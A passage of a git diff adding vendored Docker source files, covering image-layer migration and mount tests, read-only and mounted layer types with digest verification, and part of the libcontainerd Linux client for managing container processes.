...FileApplier) ([]byte, error) { + t, err := tarFromFiles(files...) + if err != nil { + return nil, err + } + + if err := graph.Create(graphID, parentID, nil); err != nil { + return nil, err + } + if _, err := graph.ApplyDiff(graphID, parentID, bytes.NewReader(t)); err != nil { + return nil, err + } + + ar, err := graph.Diff(graphID, parentID) + if err != nil { + return nil, err + } + defer ar.Close() + + return ioutil.ReadAll(ar) +} + +func TestLayerMigrationNoTarsplit(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + td, err := ioutil.TempDir("", "migration-test-") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(td) + + layer1Files := []FileApplier{ + newTestFile("/root/.bashrc", []byte("# Boring configuration"), 0644), + newTestFile("/etc/profile", []byte("# Base configuration"), 0644), + } + + layer2Files := []FileApplier{ + newTestFile("/root/.bashrc", []byte("# Updated configuration"), 0644), + } + + graph, err := newVFSGraphDriver(filepath.Join(td, "graphdriver-")) + if err != nil { + t.Fatal(err) + } + graphID1 := stringid.GenerateRandomID() + graphID2 := stringid.GenerateRandomID() + + tar1, err := tarFromFilesInGraph(graph, graphID1, "", layer1Files...) + if err != nil { + t.Fatal(err) + } + + tar2, err := tarFromFilesInGraph(graph, graphID2, graphID1, layer2Files...) + if err != nil { + t.Fatal(err) + } + + fms, err := NewFSMetadataStore(filepath.Join(td, "layers")) + if err != nil { + t.Fatal(err) + } + ls, err := NewStoreFromGraphDriver(fms, graph) + if err != nil { + t.Fatal(err) + } + + newTarDataPath := filepath.Join(td, ".migration-tardata") + diffID, size, err := ls.(*layerStore).ChecksumForGraphID(graphID1, "", "", newTarDataPath) + if err != nil { + t.Fatal(err) + } + + layer1a, err := ls.(*layerStore).RegisterByGraphID(graphID1, "", diffID, newTarDataPath, size) + if err != nil { + t.Fatal(err) + } + + layer1b, err := ls.Register(bytes.NewReader(tar1), "") + if err != nil { + t.Fatal(err) + } + + assertReferences(t, layer1a, layer1b) + + // Attempt register, should be same + layer2a, err := ls.Register(bytes.NewReader(tar2), layer1a.ChainID()) + if err != nil { + t.Fatal(err) + } + + diffID, size, err = ls.(*layerStore).ChecksumForGraphID(graphID2, graphID1, "", newTarDataPath) + if err != nil { + t.Fatal(err) + } + + layer2b, err := ls.(*layerStore).RegisterByGraphID(graphID2, layer1a.ChainID(), diffID, newTarDataPath, size) + if err != nil { + t.Fatal(err) + } + assertReferences(t, layer2a, layer2b) + + if metadata, err := ls.Release(layer2a); err != nil { + t.Fatal(err) + } else if len(metadata) > 0 { + t.Fatalf("Unexpected layer removal after first release: %#v", metadata) + } + + metadata, err := ls.Release(layer2b) + if err != nil { + t.Fatal(err) + } + + assertMetadata(t, metadata, createMetadata(layer2a)) +} + +func TestMountMigration(t *testing.T) { + // TODO Windows: Figure out why this is failing (obvious - paths... needs porting) + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + ls, _, cleanup := newTestStore(t) + defer cleanup() + + baseFiles := []FileApplier{ + newTestFile("/root/.bashrc", []byte("# Boring configuration"), 0644), + newTestFile("/etc/profile", []byte("# Base configuration"), 0644), + } + initFiles := []FileApplier{ + newTestFile("/etc/hosts", []byte{}, 0644), + newTestFile("/etc/resolv.conf", []byte{}, 0644), + } + mountFiles := []FileApplier{ + newTestFile("/etc/hosts", []byte("localhost 127.0.0.1"), 0644), + newTestFile("/root/.bashrc", []byte("# Updated configuration"), 0644), + newTestFile("/root/testfile1.txt", []byte("nothing valuable"), 0644), + } + + initTar, err := tarFromFiles(initFiles...) + if err != nil { + t.Fatal(err) + } + + mountTar, err := tarFromFiles(mountFiles...) + if err != nil { + t.Fatal(err) + } + + graph := ls.(*layerStore).driver + + layer1, err := createLayer(ls, "", initWithFiles(baseFiles...)) + if err != nil { + t.Fatal(err) + } + + graphID1 := layer1.(*referencedCacheLayer).cacheID + + containerID := stringid.GenerateRandomID() + containerInit := fmt.Sprintf("%s-init", containerID) + + if err := graph.Create(containerInit, graphID1, nil); err != nil { + t.Fatal(err) + } + if _, err := graph.ApplyDiff(containerInit, graphID1, bytes.NewReader(initTar)); err != nil { + t.Fatal(err) + } + + if err := graph.Create(containerID, containerInit, nil); err != nil { + t.Fatal(err) + } + if _, err := graph.ApplyDiff(containerID, containerInit, bytes.NewReader(mountTar)); err != nil { + t.Fatal(err) + } + + if err := ls.(*layerStore).CreateRWLayerByGraphID("migration-mount", containerID, layer1.ChainID()); err != nil { + t.Fatal(err) + } + + rwLayer1, err := ls.GetRWLayer("migration-mount") + if err != nil { + t.Fatal(err) + } + + if _, err := rwLayer1.Mount(""); err != nil { + t.Fatal(err) + } + + changes, err := rwLayer1.Changes() + if err != nil { + t.Fatal(err) + } + + if expected := 5; len(changes) != expected { + t.Logf("Changes %#v", changes) + t.Fatalf("Wrong number of changes %d, expected %d", len(changes), expected) + } + + sortChanges(changes) + + assertChange(t, changes[0], archive.Change{ + Path: "/etc", + Kind: archive.ChangeModify, + }) + assertChange(t, changes[1], archive.Change{ + Path: "/etc/hosts", + Kind: archive.ChangeModify, + }) + assertChange(t, changes[2], archive.Change{ + Path: "/root", + Kind: archive.ChangeModify, + }) + assertChange(t, changes[3], archive.Change{ + Path: "/root/.bashrc", + Kind: archive.ChangeModify, + }) + assertChange(t, changes[4], archive.Change{ + Path: "/root/testfile1.txt", + Kind: archive.ChangeAdd, + }) + + if _, err := ls.CreateRWLayer("migration-mount", layer1.ChainID(), "", nil, nil); err == nil { + t.Fatal("Expected error creating mount with same name") + } else if err != ErrMountNameConflict { + t.Fatal(err) + } + + rwLayer2, err := ls.GetRWLayer("migration-mount") + if err != nil { + t.Fatal(err) + } + + if getMountLayer(rwLayer1) != getMountLayer(rwLayer2) { + t.Fatal("Expected same layer from get with same name as from migrate") + } + + if _, err := rwLayer2.Mount(""); err != nil { + t.Fatal(err) + } + + if _, err := rwLayer2.Mount(""); err != nil { + t.Fatal(err) + } + + if metadata, err := ls.Release(layer1); err != nil { + t.Fatal(err) + } else if len(metadata) > 0 { + t.Fatalf("Expected no layers to be deleted, deleted %#v", metadata) + } + + if err := rwLayer1.Unmount(); err != nil { + t.Fatal(err) + } + + if _, err := ls.ReleaseRWLayer(rwLayer1); err != nil { + t.Fatal(err) + } + + if err := rwLayer2.Unmount(); err != nil { + t.Fatal(err) + } + if err := rwLayer2.Unmount(); err != nil { + t.Fatal(err) + } + metadata, err := ls.ReleaseRWLayer(rwLayer2) + if err != nil { + t.Fatal(err) + } + if len(metadata) == 0 { + t.Fatal("Expected base layer to be deleted when deleting mount") + } + + assertMetadata(t, metadata, createMetadata(layer1)) +} diff --git a/vendor/github.com/docker/docker/layer/mount_test.go b/vendor/github.com/docker/docker/layer/mount_test.go new file mode 100644 index 0000000000..7a8637eae9 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/mount_test.go @@ -0,0 +1,230 @@ +package layer + +import ( + "io/ioutil" + "os" + "path/filepath" + "runtime" + "sort" + "testing" + + "github.com/docker/docker/pkg/archive" +) + +func TestMountInit(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + ls, _, cleanup := newTestStore(t) + defer cleanup() + + basefile := newTestFile("testfile.txt", []byte("base data!"), 0644) + initfile := newTestFile("testfile.txt", []byte("init data!"), 0777) + + li := initWithFiles(basefile) + layer, err := createLayer(ls, "", li) + if err != nil { + t.Fatal(err) + } + + mountInit := func(root string) error { + return initfile.ApplyFile(root) + } + + m, err := ls.CreateRWLayer("fun-mount", layer.ChainID(), "", mountInit, nil) + if err != nil { + t.Fatal(err) + } + + path, err := m.Mount("") + if err != nil { + t.Fatal(err) + } + + f, err := os.Open(filepath.Join(path, "testfile.txt")) + if err != nil { + t.Fatal(err) + } + defer f.Close() + + fi, err := f.Stat() + if err != nil { + t.Fatal(err) + } + + b, err := ioutil.ReadAll(f) + if err != nil { + t.Fatal(err) + } + + if expected := "init data!"; string(b) != expected { + t.Fatalf("Unexpected test file contents %q, expected %q", string(b), expected) + } + + if fi.Mode().Perm() != 0777 { + t.Fatalf("Unexpected filemode %o, expecting %o", fi.Mode().Perm(), 0777) + } +} + +func TestMountSize(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + ls, _, cleanup := newTestStore(t) + defer cleanup() + + content1 := []byte("Base contents") + content2 := []byte("Mutable contents") + contentInit := []byte("why am I excluded from the size ☹") + + li := initWithFiles(newTestFile("file1", content1, 0644)) + layer, err := createLayer(ls, "", li) + if err != nil { + t.Fatal(err) + } + + mountInit := func(root string) error { + return newTestFile("file-init", contentInit, 0777).ApplyFile(root) + } + + m, err := ls.CreateRWLayer("mount-size", layer.ChainID(), "", mountInit, nil) + if err != nil { + t.Fatal(err) + } + + path, err := m.Mount("") + if err != nil { + t.Fatal(err) + } + + if err := ioutil.WriteFile(filepath.Join(path, "file2"), content2, 0755); err != nil { + t.Fatal(err) + } + + mountSize, err := m.Size() + if err != nil { + t.Fatal(err) + } + + if expected := len(content2); int(mountSize) != expected { + t.Fatalf("Unexpected mount size %d, expected %d", int(mountSize), expected) + } +} + +func TestMountChanges(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + ls, _, cleanup := newTestStore(t) + defer cleanup() + + basefiles := []FileApplier{ + newTestFile("testfile1.txt", []byte("base data!"), 0644), + newTestFile("testfile2.txt", []byte("base data!"), 0644), + newTestFile("testfile3.txt", []byte("base data!"), 0644), + } + initfile := newTestFile("testfile1.txt", []byte("init data!"), 0777) + + li := initWithFiles(basefiles...) + layer, err := createLayer(ls, "", li) + if err != nil { + t.Fatal(err) + } + + mountInit := func(root string) error { + return initfile.ApplyFile(root) + } + + m, err := ls.CreateRWLayer("mount-changes", layer.ChainID(), "", mountInit, nil) + if err != nil { + t.Fatal(err) + } + + path, err := m.Mount("") + if err != nil { + t.Fatal(err) + } + + if err := os.Chmod(filepath.Join(path, "testfile1.txt"), 0755); err != nil { + t.Fatal(err) + } + + if err := ioutil.WriteFile(filepath.Join(path, "testfile1.txt"), []byte("mount data!"), 0755); err != nil { + t.Fatal(err) + } + + if err := os.Remove(filepath.Join(path, "testfile2.txt")); err != nil { + t.Fatal(err) + } + + if err := os.Chmod(filepath.Join(path, "testfile3.txt"), 0755); err != nil { + t.Fatal(err) + } + + if err := ioutil.WriteFile(filepath.Join(path, "testfile4.txt"), []byte("mount data!"), 0644); err != nil { + t.Fatal(err) + } + + changes, err := m.Changes() + if err != nil { + t.Fatal(err) + } + + if expected := 4; len(changes) != expected { + t.Fatalf("Wrong number of changes %d, expected %d", len(changes), expected) + } + + sortChanges(changes) + + assertChange(t, changes[0], archive.Change{ + Path: "/testfile1.txt", + Kind: archive.ChangeModify, + }) + assertChange(t, changes[1], archive.Change{ + Path: "/testfile2.txt", + Kind: archive.ChangeDelete, + }) + assertChange(t, changes[2], archive.Change{ + Path: "/testfile3.txt", + Kind: archive.ChangeModify, + }) + assertChange(t, changes[3], archive.Change{ + Path: "/testfile4.txt", + Kind: archive.ChangeAdd, + }) +} + +func assertChange(t *testing.T, actual, expected archive.Change) { + if actual.Path != expected.Path { + t.Fatalf("Unexpected change path %s, expected %s", actual.Path, expected.Path) + } + if actual.Kind != expected.Kind { + t.Fatalf("Unexpected change type %s, expected %s", actual.Kind, expected.Kind) + } +} + +func sortChanges(changes []archive.Change) { + cs := &changeSorter{ + changes: changes, + } + sort.Sort(cs) +} + +type changeSorter struct { + changes []archive.Change +} + +func (cs *changeSorter) Len() int { + return len(cs.changes) +} + +func (cs *changeSorter) Swap(i, j int) { + cs.changes[i], cs.changes[j] = cs.changes[j], cs.changes[i] +} + +func (cs *changeSorter) Less(i, j int) bool { + return cs.changes[i].Path < cs.changes[j].Path +} diff --git a/vendor/github.com/docker/docker/layer/mounted_layer.go b/vendor/github.com/docker/docker/layer/mounted_layer.go new file mode 100644 index 0000000000..a5cfcfa9bd --- /dev/null +++ b/vendor/github.com/docker/docker/layer/mounted_layer.go @@ -0,0 +1,99 @@ +package layer + +import ( + "io" + + "github.com/docker/docker/pkg/archive" +) + +type mountedLayer struct { + name string + mountID string + initID string + parent *roLayer + path string + layerStore *layerStore + + references map[RWLayer]*referencedRWLayer +} + +func (ml *mountedLayer) cacheParent() string { + if ml.initID != "" { + return ml.initID + } + if ml.parent != nil { + return ml.parent.cacheID + } + return "" +} + +func (ml *mountedLayer) TarStream() (io.ReadCloser, error) { + return ml.layerStore.driver.Diff(ml.mountID, ml.cacheParent()) +} + +func (ml *mountedLayer) Name() string { + return ml.name +} + +func (ml *mountedLayer) Parent() Layer { + if ml.parent != nil { + return ml.parent + } + + // Return a nil interface instead of an interface wrapping a nil + // pointer. + return nil +} + +func (ml *mountedLayer) Size() (int64, error) { + return ml.layerStore.driver.DiffSize(ml.mountID, ml.cacheParent()) +} + +func (ml *mountedLayer) Changes() ([]archive.Change, error) { + return ml.layerStore.driver.Changes(ml.mountID, ml.cacheParent()) +} + +func (ml *mountedLayer) Metadata() (map[string]string, error) { + return ml.layerStore.driver.GetMetadata(ml.mountID) +} + +func (ml *mountedLayer) getReference() RWLayer { + ref := &referencedRWLayer{ + mountedLayer: ml, + } + ml.references[ref] = ref + + return ref +} + +func (ml *mountedLayer) hasReferences() bool { + return len(ml.references) > 0 +} + +func (ml *mountedLayer) deleteReference(ref RWLayer) error { + if _, ok := ml.references[ref]; !ok { + return ErrLayerNotRetained + } + delete(ml.references, ref) + return nil +} + +func (ml *mountedLayer) retakeReference(r RWLayer) { + if ref, ok := r.(*referencedRWLayer); ok { + ml.references[ref] = ref + } +} + +type referencedRWLayer struct { + *mountedLayer +} + +func (rl *referencedRWLayer) Mount(mountLabel string) (string, error) { + return rl.layerStore.driver.Get(rl.mountedLayer.mountID, mountLabel) +} + +// Unmount decrements the activity count and unmounts the underlying layer +// Callers should only call `Unmount` once per call to `Mount`, even on error. +func (rl *referencedRWLayer) Unmount() error { + return rl.layerStore.driver.Put(rl.mountedLayer.mountID) +} diff --git a/vendor/github.com/docker/docker/layer/ro_layer.go b/vendor/github.com/docker/docker/layer/ro_layer.go new file mode 100644 index 0000000000..7c8d233a35 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/ro_layer.go @@ -0,0 +1,192 @@ +package layer + +import ( + "fmt" + "io" + + "github.com/docker/distribution" + "github.com/docker/distribution/digest" +) + +type roLayer struct { + chainID ChainID + diffID DiffID + parent *roLayer + cacheID string + size int64 + layerStore *layerStore + descriptor distribution.Descriptor + + referenceCount int + references map[Layer]struct{} +} + +// TarStream for roLayer guarentees that the data that is produced is the exact +// data that the layer was registered with. +func (rl *roLayer) TarStream() (io.ReadCloser, error) { + r, err := rl.layerStore.store.TarSplitReader(rl.chainID) + if err != nil { + return nil, err + } + + pr, pw := io.Pipe() + go func() { + err := rl.layerStore.assembleTarTo(rl.cacheID, r, nil, pw) + if err != nil { + pw.CloseWithError(err) + } else { + pw.Close() + } + }() + rc, err := newVerifiedReadCloser(pr, digest.Digest(rl.diffID)) + if err != nil { + return nil, err + } + return rc, nil +} + +// TarStreamFrom does not make any guarentees to the correctness of the produced +// data. As such it should not be used when the layer content must be verified +// to be an exact match to the registered layer. +func (rl *roLayer) TarStreamFrom(parent ChainID) (io.ReadCloser, error) { + var parentCacheID string + for pl := rl.parent; pl != nil; pl = pl.parent { + if pl.chainID == parent { + parentCacheID = pl.cacheID + break + } + } + + if parent != ChainID("") && parentCacheID == "" { + return nil, fmt.Errorf("layer ID '%s' is not a parent of the specified layer: cannot provide diff to non-parent", parent) + } + return rl.layerStore.driver.Diff(rl.cacheID, parentCacheID) +} + +func (rl *roLayer) ChainID() ChainID { + return rl.chainID +} + +func (rl *roLayer) DiffID() DiffID { + return rl.diffID +} + +func (rl *roLayer) Parent() Layer { + if rl.parent == nil { + return nil + } + return rl.parent +} + +func (rl *roLayer) Size() (size int64, err error) { + if rl.parent != nil { + size, err = rl.parent.Size() + if err != nil { + return + } + } + + return size + rl.size, nil +} + +func (rl *roLayer) DiffSize() (size int64, err error) { + return rl.size, nil +} + +func (rl *roLayer) Metadata() (map[string]string, error) { + return rl.layerStore.driver.GetMetadata(rl.cacheID) +} + +type referencedCacheLayer struct { + *roLayer +} + +func (rl *roLayer) getReference() Layer { + ref := &referencedCacheLayer{ + roLayer: rl, + } + rl.references[ref] = struct{}{} + + return ref +} + +func (rl *roLayer) hasReference(ref Layer) bool { + _, ok := rl.references[ref] + return ok +} + +func (rl *roLayer) hasReferences() bool { + return len(rl.references) > 0 +} + +func (rl *roLayer) deleteReference(ref Layer) { + delete(rl.references, ref) +} + +func (rl *roLayer) depth() int { + if rl.parent == nil { + return 1 + } + return rl.parent.depth() + 1 +} + +func storeLayer(tx MetadataTransaction, layer *roLayer) error { + if err := tx.SetDiffID(layer.diffID); err != nil { + return err + } + if err := tx.SetSize(layer.size); err != nil { + return err + } + if err := tx.SetCacheID(layer.cacheID); err != nil { + return err + } + // Do not store empty descriptors + if layer.descriptor.Digest != "" { + if err := tx.SetDescriptor(layer.descriptor); err != nil { + return err + } + } + if layer.parent != nil { + if err := tx.SetParent(layer.parent.chainID); err != nil { + return err + } + } + + return nil +} + +func newVerifiedReadCloser(rc io.ReadCloser, dgst digest.Digest) (io.ReadCloser, error) { + verifier, err := digest.NewDigestVerifier(dgst) + if err != nil { + return nil, err + } + return &verifiedReadCloser{ + rc: rc, + dgst: dgst, + verifier: verifier, + }, nil +} + +type verifiedReadCloser struct { + rc io.ReadCloser + dgst digest.Digest + verifier digest.Verifier +} + +func (vrc *verifiedReadCloser) Read(p []byte) (n int, err error) { + n, err = vrc.rc.Read(p) + if n > 0 { + if n, err := vrc.verifier.Write(p[:n]); err != nil { + return n, err + } + } + if err == io.EOF { + if !vrc.verifier.Verified() { + err = fmt.Errorf("could not verify layer data for: %s. This may be because internal files in the layer store were modified. Re-pulling or rebuilding this image may resolve the issue", vrc.dgst) + } + } + return +} +func (vrc *verifiedReadCloser) Close() error { + return vrc.rc.Close() +} diff --git a/vendor/github.com/docker/docker/layer/ro_layer_windows.go b/vendor/github.com/docker/docker/layer/ro_layer_windows.go new file mode 100644 index 0000000000..32bd7182a3 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/ro_layer_windows.go @@ -0,0 +1,9 @@ +package layer + +import "github.com/docker/distribution" + +var _ distribution.Describable = &roLayer{} + +func (rl *roLayer) Descriptor() distribution.Descriptor { + return rl.descriptor +} diff --git a/vendor/github.com/docker/docker/libcontainerd/client.go b/vendor/github.com/docker/docker/libcontainerd/client.go new file mode 100644 index 0000000000..c14c1c5e46 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/client.go @@ -0,0 +1,46 @@ +package libcontainerd + +import ( + "fmt" + "sync" + + "github.com/docker/docker/pkg/locker" +) + +// clientCommon contains the platform agnostic fields used in the client structure +type clientCommon struct { + backend Backend + containers map[string]*container + locker *locker.Locker + mapMutex sync.RWMutex // protects read/write oprations from containers map +} + +func (clnt *client) lock(containerID string) { + clnt.locker.Lock(containerID) +} + +func (clnt *client) unlock(containerID string) { + clnt.locker.Unlock(containerID) +} + +// must hold a lock for cont.containerID +func (clnt *client) appendContainer(cont *container) { + clnt.mapMutex.Lock() + clnt.containers[cont.containerID] = cont + clnt.mapMutex.Unlock() +} +func (clnt *client) deleteContainer(containerID string) { + clnt.mapMutex.Lock() + delete(clnt.containers, containerID) + clnt.mapMutex.Unlock() +} + +func (clnt *client) getContainer(containerID string) (*container, error) { + clnt.mapMutex.RLock() + container, ok := clnt.containers[containerID] + defer clnt.mapMutex.RUnlock() + if !ok { + return nil, fmt.Errorf("invalid container: %s", containerID) // fixme: typed error + } + return container, nil +} diff --git a/vendor/github.com/docker/docker/libcontainerd/client_linux.go b/vendor/github.com/docker/docker/libcontainerd/client_linux.go new file mode 100644 index 0000000000..190f981865 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/client_linux.go @@ -0,0 +1,605 @@ +package libcontainerd + +import ( + "fmt" + "os" + "strings" + "sync" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + containerd "github.com/docker/containerd/api/grpc/types" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/mount" + "github.com/golang/protobuf/ptypes" + "github.com/golang/protobuf/ptypes/timestamp" + specs "github.com/opencontainers/runtime-spec/specs-go" + "golang.org/x/net/context" +) + +type client struct { + clientCommon + + // Platform specific properties below here. + remote *remote + q queue + exitNotifiers map[string]*exitNotifier + liveRestore bool +} + +// GetServerVersion returns the connected server version information +func (clnt *client) GetServerVersion(ctx context.Context) (*ServerVersion, error) { + resp, err := clnt.remote.apiClient.GetServerVersion(ctx, &containerd.GetServerVersionRequest{}) + if err != nil { + return nil, err + } + + sv := &ServerVersion{ + GetServerVersionResponse: *resp, + } + + return sv, nil +} + +// AddProcess is the handler for adding a process to an already running +// container. It's called through docker exec. It returns the system pid of the +// exec'd process. +func (clnt *client) AddProcess(ctx context.Context, containerID, processFriendlyName string, specp Process, attachStdio StdioCallback) (pid int, err error) { + clnt.lock(containerID) + defer clnt.unlock(containerID) + container, err := clnt.getContainer(containerID) + if err != nil { + return -1, err + } + + spec, err := container.spec() + if err != nil { + return -1, err + } + sp := spec.Process + sp.Args = specp.Args + sp.Terminal = specp.Terminal + if len(specp.Env) > 0 { + sp.Env = specp.Env + } + if specp.Cwd != nil { + sp.Cwd = *specp.Cwd + } + if specp.User != nil { + sp.User = specs.User{ + UID: specp.User.UID, + GID: specp.User.GID, + AdditionalGids: specp.User.AdditionalGids, + } + } + if specp.Capabilities != nil { + sp.Capabilities = specp.Capabilities + } + + p := container.newProcess(processFriendlyName) + + r := &containerd.AddProcessRequest{ + Args: sp.Args, + Cwd: sp.Cwd, + Terminal: sp.Terminal, + Id: containerID, + Env: sp.Env, + User: &containerd.User{ + Uid: sp.User.UID, + Gid: sp.User.GID, + AdditionalGids: sp.User.AdditionalGids, + }, + Pid: processFriendlyName, + Stdin: p.fifo(syscall.Stdin), + Stdout: p.fifo(syscall.Stdout), + Stderr: p.fifo(syscall.Stderr), + Capabilities: sp.Capabilities, + ApparmorProfile: sp.ApparmorProfile, + SelinuxLabel: sp.SelinuxLabel, + NoNewPrivileges: sp.NoNewPrivileges, + Rlimits: convertRlimits(sp.Rlimits), + } + + fifoCtx, cancel := context.WithCancel(context.Background()) + defer func() { + if err != nil { + cancel() + } + }() + + iopipe, err := p.openFifos(fifoCtx, sp.Terminal) + if err != nil { + return -1, err + } + + resp, err := clnt.remote.apiClient.AddProcess(ctx, r) + if err != nil { + p.closeFifos(iopipe) + return -1, err + } + + var stdinOnce sync.Once + stdin := iopipe.Stdin + iopipe.Stdin = ioutils.NewWriteCloserWrapper(stdin, func() error { + var err error + stdinOnce.Do(func() { // on error from attach we don't know if stdin was already closed + err = stdin.Close() + if err2 := p.sendCloseStdin(); err == nil { + err = err2 + } + }) + return err + }) + + container.processes[processFriendlyName] = p + + if err := attachStdio(*iopipe); err != nil { + p.closeFifos(iopipe) + return -1, err + } + + return int(resp.SystemPid), nil +} + +func (clnt *client) SignalProcess(containerID string, pid string, sig int) error { + clnt.lock(containerID) + defer clnt.unlock(containerID) + _, err := clnt.remote.apiClient.Signal(context.Background(), &containerd.SignalRequest{ + Id: containerID, + Pid: pid, + Signal: uint32(sig), + }) + return err +} + +func (clnt *client) Resize(containerID, processFriendlyName string, width, height int) error { + clnt.lock(containerID) + defer clnt.unlock(containerID) + if _, err := clnt.getContainer(containerID); err != nil { + return err + } + _, err := clnt.remote.apiClient.UpdateProcess(context.Background(), &containerd.UpdateProcessRequest{ + Id: containerID, + Pid: processFriendlyName, + Width: uint32(width), + Height: uint32(height), + }) + return err +} + +func (clnt *client) Pause(containerID string) error { + return clnt.setState(containerID, StatePause) +} + +func (clnt *client) setState(containerID, state string) error { + clnt.lock(containerID) + container, err := clnt.getContainer(containerID) + if err != nil { + clnt.unlock(containerID) + return err + } + if container.systemPid == 0 { + clnt.unlock(containerID) + return fmt.Errorf("No active process for container %s", containerID) + } + st := "running" + if state == StatePause { + st = "paused" + } + chstate := make(chan struct{}) + _, err = clnt.remote.apiClient.UpdateContainer(context.Background(), &containerd.UpdateContainerRequest{ + Id: containerID, + Pid: InitFriendlyName, + Status: st, + }) + if err != nil { + clnt.unlock(containerID) + return err + } + container.pauseMonitor.append(state, chstate) + clnt.unlock(containerID) + <-chstate + return nil +} + +func (clnt *client) Resume(containerID string) error { + return clnt.setState(containerID, StateResume) +} + +func (clnt *client) Stats(containerID string) (*Stats, error) { + resp, err := clnt.remote.apiClient.Stats(context.Background(), &containerd.StatsRequest{containerID}) + if err != nil { + return nil, err + } + return (*Stats)(resp), nil +} + +// Take care of the old 1.11.0 behavior in case the version upgrade +// happened without a clean daemon shutdown +func (clnt *client) cleanupOldRootfs(containerID string) { + // Unmount and delete the bundle folder + if mts, err := mount.GetMounts(); err == nil { + for _, mts := range mts { + if strings.HasSuffix(mts.Mountpoint, containerID+"/rootfs") { + if err := syscall.Unmount(mts.Mountpoint, syscall.MNT_DETACH); err == nil { + os.RemoveAll(strings.TrimSuffix(mts.Mountpoint, "/rootfs")) + } + break + } + } + } +} + +func (clnt *client) setExited(containerID string, exitCode uint32) error { + clnt.lock(containerID) + defer clnt.unlock(containerID) + + err := clnt.backend.StateChanged(containerID, StateInfo{ + CommonStateInfo: CommonStateInfo{ + State: StateExit, + ExitCode: exitCode, + }}) + + clnt.cleanupOldRootfs(containerID) + + return err +} + +func (clnt *client) GetPidsForContainer(containerID string) ([]int, error) { + cont, err := clnt.getContainerdContainer(containerID) + if err != nil { + return nil, err + } + pids := make([]int, len(cont.Pids)) + for i, p := range cont.Pids { + pids[i] = int(p) + } + return pids, nil +} + +// Summary returns a summary of the processes running in a container. +// This is a no-op on Linux. +func (clnt *client) Summary(containerID string) ([]Summary, error) { + return nil, nil +} + +func (clnt *client) getContainerdContainer(containerID string) (*containerd.Container, error) { + resp, err := clnt.remote.apiClient.State(context.Background(), &containerd.StateRequest{Id: containerID}) + if err != nil { + return nil, err + } + for _, cont := range resp.Containers { + if cont.Id == containerID { + return cont, nil + } + } + return nil, fmt.Errorf("invalid state response") +} + +func (clnt *client) UpdateResources(containerID string, resources Resources) error { + clnt.lock(containerID) + defer clnt.unlock(containerID) + container, err := clnt.getContainer(containerID) + if err != nil { + return err + } + if container.systemPid == 0 { + return fmt.Errorf("No active process for container %s", containerID) + } + _, err = clnt.remote.apiClient.UpdateContainer(context.Background(), &containerd.UpdateContainerRequest{ + Id: containerID, + Pid: InitFriendlyName, + Resources: (*containerd.UpdateResource)(&resources), + }) + if err != nil { + return err + } + return nil +} + +func (clnt *client) getExitNotifier(containerID string) *exitNotifier { + clnt.mapMutex.RLock() + defer clnt.mapMutex.RUnlock() + return clnt.exitNotifiers[containerID] +} + +func (clnt *client) getOrCreateExitNotifier(containerID string) *exitNotifier { + clnt.mapMutex.Lock() + w, ok := clnt.exitNotifiers[containerID] + defer clnt.mapMutex.Unlock() + if !ok { + w = &exitNotifier{c: make(chan struct{}), client: clnt} + clnt.exitNotifiers[containerID] = w + } + return w +} + +func (clnt *client) restore(cont *containerd.Container, lastEvent *containerd.Event, attachStdio StdioCallback, options ...CreateOption) (err error) { + clnt.lock(cont.Id) + defer clnt.unlock(cont.Id) + + logrus.Debugf("libcontainerd: restore container %s state %s", cont.Id, cont.Status) + + containerID := cont.Id + if _, err := clnt.getContainer(containerID); err == nil { + return fmt.Errorf("container %s is already active", containerID) + } + + defer func() { + if err != nil { + clnt.deleteContainer(cont.Id) + } + }() + + container := clnt.newContainer(cont.BundlePath, options...) + container.systemPid = systemPid(cont) + + var terminal bool + for _, p := range cont.Processes { + if p.Pid == InitFriendlyName { + terminal = p.Terminal + } + } + + fifoCtx, cancel := context.WithCancel(context.Background()) + defer func() { + if err != nil { + cancel() + } + }() + + iopipe, err := container.openFifos(fifoCtx, terminal) + if err != nil { + return err + } + var stdinOnce sync.Once + stdin := iopipe.Stdin + iopipe.Stdin = ioutils.NewWriteCloserWrapper(stdin, func() error { + var err error + stdinOnce.Do(func() { // on error from attach we don't know if stdin was already closed + err = stdin.Close() + }) + return err + }) + + if err := attachStdio(*iopipe); err != nil { + container.closeFifos(iopipe) + return err + } + + clnt.appendContainer(container) + + err = clnt.backend.StateChanged(containerID, StateInfo{ + CommonStateInfo: CommonStateInfo{ + State: StateRestore, + Pid: container.systemPid, + }}) + + if err != nil { + container.closeFifos(iopipe) + return err + } + + if lastEvent != nil { + // This should only be a pause or resume event + if lastEvent.Type == StatePause || lastEvent.Type == StateResume { + return clnt.backend.StateChanged(containerID, StateInfo{ + CommonStateInfo: CommonStateInfo{ + State: lastEvent.Type, + Pid: container.systemPid, + }}) + } + + logrus.Warnf("libcontainerd: unexpected backlog event: %#v", lastEvent) + } + + return nil +} + +func (clnt *client) getContainerLastEventSinceTime(id string, tsp *timestamp.Timestamp) (*containerd.Event, error) { + er := &containerd.EventsRequest{ + Timestamp: tsp, + StoredOnly: true, + Id: id, + } + events, err := clnt.remote.apiClient.Events(context.Background(), er) + if err != nil { + logrus.Errorf("libcontainerd: failed to get container events stream for %s: %q", er.Id, err) + return nil, err + } + + var ev *containerd.Event + for { + e, err := events.Recv() + if err != nil { + if err.Error() == "EOF" { + break + } + logrus.Errorf("libcontainerd: failed to get container event for %s: %q", id, err) + return nil, err + } + ev = e + logrus.Debugf("libcontainerd: received past event %#v", ev) + } + + return ev, nil +} + +func (clnt *client) getContainerLastEvent(id string) (*containerd.Event, error) { + ev, err := clnt.getContainerLastEventSinceTime(id, clnt.remote.restoreFromTimestamp) + if err == nil && ev == nil { + // If ev is nil and the container is running in 